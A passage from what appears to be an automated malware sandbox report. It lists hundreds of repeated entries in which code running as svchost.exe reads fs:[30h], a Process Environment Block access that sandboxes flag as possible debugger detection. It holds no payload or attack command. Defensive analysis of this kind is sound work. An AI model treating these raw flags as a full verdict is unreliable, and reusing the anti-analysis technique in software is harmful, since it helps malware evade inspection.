                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A250 mov eax, dword ptr fs:[00000030h]1_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736259 mov eax, dword ptr fs:[00000030h]1_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA250 mov eax, dword ptr fs:[00000030h]1_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA250 mov eax, dword ptr fs:[00000030h]1_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B8243 mov eax, dword ptr fs:[00000030h]1_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B8243 mov ecx, dword ptr fs:[00000030h]1_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372823B mov eax, dword ptr fs:[00000030h]1_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038062D6 mov eax, dword ptr fs:[00000030h]1_2_038062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]1_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]1_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]1_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402A0 mov eax, dword ptr fs:[00000030h]1_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402A0 mov eax, dword ptr fs:[00000030h]1_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov ecx, dword ptr fs:[00000030h]1_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380625D mov eax, dword ptr fs:[00000030h]1_2_0380625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E284 mov eax, dword ptr fs:[00000030h]1_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E284 mov eax, dword ptr fs:[00000030h]1_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]1_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]1_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]1_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C156 mov eax, dword ptr fs:[00000030h]1_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C8158 mov eax, dword ptr fs:[00000030h]1_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736154 mov eax, dword ptr fs:[00000030h]1_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736154 mov eax, dword ptr fs:[00000030h]1_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov ecx, dword ptr fs:[00000030h]1_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760124 mov eax, dword ptr fs:[00000030h]1_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov ecx, dword ptr fs:[00000030h]1_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]1_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]1_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]1_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038061E5 mov eax, dword ptr fs:[00000030h]1_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F0115 mov eax, dword ptr fs:[00000030h]1_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037601F8 mov eax, dword ptr fs:[00000030h]1_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F61C3 mov eax, dword ptr fs:[00000030h]1_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F61C3 mov eax, dword ptr fs:[00000030h]1_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804164 mov eax, dword ptr fs:[00000030h]1_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804164 mov eax, dword ptr fs:[00000030h]1_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]1_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]1_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]1_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03770185 mov eax, dword ptr fs:[00000030h]1_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EC188 mov eax, dword ptr fs:[00000030h]1_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EC188 mov eax, dword ptr fs:[00000030h]1_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4180 mov eax, dword ptr fs:[00000030h]1_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4180 mov eax, dword ptr fs:[00000030h]1_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375C073 mov eax, dword ptr fs:[00000030h]1_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732050 mov eax, dword ptr fs:[00000030h]1_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6050 mov eax, dword ptr fs:[00000030h]1_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6030 mov eax, dword ptr fs:[00000030h]1_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A020 mov eax, dword ptr fs:[00000030h]1_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C020 mov eax, dword ptr fs:[00000030h]1_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B4000 mov ecx, dword ptr fs:[00000030h]1_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C0F0 mov eax, dword ptr fs:[00000030h]1_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037720F0 mov ecx, dword ptr fs:[00000030h]1_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037380E9 mov eax, dword ptr fs:[00000030h]1_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B60E0 mov eax, dword ptr fs:[00000030h]1_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B20DE mov eax, dword ptr fs:[00000030h]1_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F60B8 mov eax, dword ptr fs:[00000030h]1_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F60B8 mov ecx, dword ptr fs:[00000030h]1_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037280A0 mov eax, dword ptr fs:[00000030h]1_2_037280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C80A8 mov eax, dword ptr fs:[00000030h]1_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373208A mov eax, dword ptr fs:[00000030h]1_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738770 mov eax, dword ptr fs:[00000030h]1_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730750 mov eax, dword ptr fs:[00000030h]1_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE75D mov eax, dword ptr fs:[00000030h]1_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772750 mov eax, dword ptr fs:[00000030h]1_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772750 mov eax, dword ptr fs:[00000030h]1_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B4755 mov eax, dword ptr fs:[00000030h]1_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376674D mov esi, dword ptr fs:[00000030h]1_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376674D mov eax, dword ptr fs:[00000030h]1_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376674D mov eax, dword ptr fs:[00000030h]1_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376273C mov eax, dword ptr fs:[00000030h]1_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376273C mov ecx, dword ptr fs:[00000030h]1_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376273C mov eax, dword ptr fs:[00000030h]1_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AC730 mov eax, dword ptr fs:[00000030h]1_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C720 mov eax, dword ptr fs:[00000030h]1_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C720 mov eax, dword ptr fs:[00000030h]1_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730710 mov eax, dword ptr fs:[00000030h]1_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760710 mov eax, dword ptr fs:[00000030h]1_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C700 mov eax, dword ptr fs:[00000030h]1_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037347FB mov eax, dword ptr fs:[00000030h]1_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037347FB mov eax, dword ptr fs:[00000030h]1_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]1_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]1_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]1_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE7E1 mov eax, dword ptr fs:[00000030h]1_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373C7C0 mov eax, dword ptr fs:[00000030h]1_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B07C3 mov eax, dword ptr fs:[00000030h]1_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037307AF mov eax, dword ptr fs:[00000030h]1_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E47A0 mov eax, dword ptr fs:[00000030h]1_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D678E mov eax, dword ptr fs:[00000030h]1_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03762674 mov eax, dword ptr fs:[00000030h]1_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F866E mov eax, dword ptr fs:[00000030h]1_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F866E mov eax, dword ptr fs:[00000030h]1_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A660 mov eax, dword ptr fs:[00000030h]1_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A660 mov eax, dword ptr fs:[00000030h]1_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374C640 mov eax, dword ptr fs:[00000030h]1_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E627 mov eax, dword ptr fs:[00000030h]1_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03766620 mov eax, dword ptr fs:[00000030h]1_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768620 mov eax, dword ptr fs:[00000030h]1_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373262C mov eax, dword ptr fs:[00000030h]1_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772619 mov eax, dword ptr fs:[00000030h]1_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE609 mov eax, dword ptr fs:[00000030h]1_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]1_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]1_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A6C7 mov eax, dword ptr fs:[00000030h]1_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037666B0 mov eax, dword ptr fs:[00000030h]1_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C6A6 mov eax, dword ptr fs:[00000030h]1_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]1_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]1_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]1_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]1_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6500 mov eax, dword ptr fs:[00000030h]1_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037325E0 mov eax, dword ptr fs:[00000030h]1_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]1_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]1_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037365D0 mov eax, dword ptr fs:[00000030h]1_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]1_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]1_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]1_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]1_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]1_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]1_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E59C mov eax, dword ptr fs:[00000030h]1_2_0376E59C
